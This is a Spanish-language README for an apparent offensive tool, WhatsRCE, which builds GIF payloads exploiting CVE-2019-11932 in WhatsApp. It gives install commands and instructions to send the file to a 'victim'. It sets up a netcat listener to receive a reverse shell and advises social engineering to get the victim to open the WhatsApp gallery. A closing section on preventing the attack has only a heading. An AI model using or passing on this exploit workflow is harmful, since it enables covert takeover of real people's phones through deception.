WhatsRCE
Esta es una herramienta de generación automatizada de payloads para CVE-2019-11932 (Ejecución Remota de Código en WhatsApp)
- Instalación automática de GCC (comando inofensivo, puedes ver que es de código abierto)
- Guardado en archivo .GIF
¿Cómo Usarlo?
sudo apt install git
git clone https://github.com/KeepWannabe/WhatsRCE
cd WhatsRCE && bash start.sh
¿Cómo Obtener una Shell?
- Solo envía el archivo .GIF a la víctima COMO DOCUMENTO, NO COMO IMAGEN
- Y configura nc / netcat en el puerto que estableciste en la herramienta WhatsRCE {nc -lnvp tu_puerto}
- Puedes usar técnicas de ingeniería social para que las víctimas se sientan atraídas a ejecutar este exploit
- Dile a la víctima que abra la galería a través de WhatsApp y pídele que envíe cualquier foto (no es necesario, solo basta con que entre a la galería, no hay problema); después de unos segundos recibirás una conexión de shell desde la víctima
o simplemente mira esto
VIDEO DEMOSTRATIVO
https://drive.google.com/file/d/1T-v5XG8yQuiPojeMpOAG6UGr2TYpocIj/view
si el enlace anterior no está disponible
https://drive.google.com/open?id=1X9nBlf5oj5ef2UoYGOfusjxAiow8nKEK
¿Cómo Evitar Este Ataque?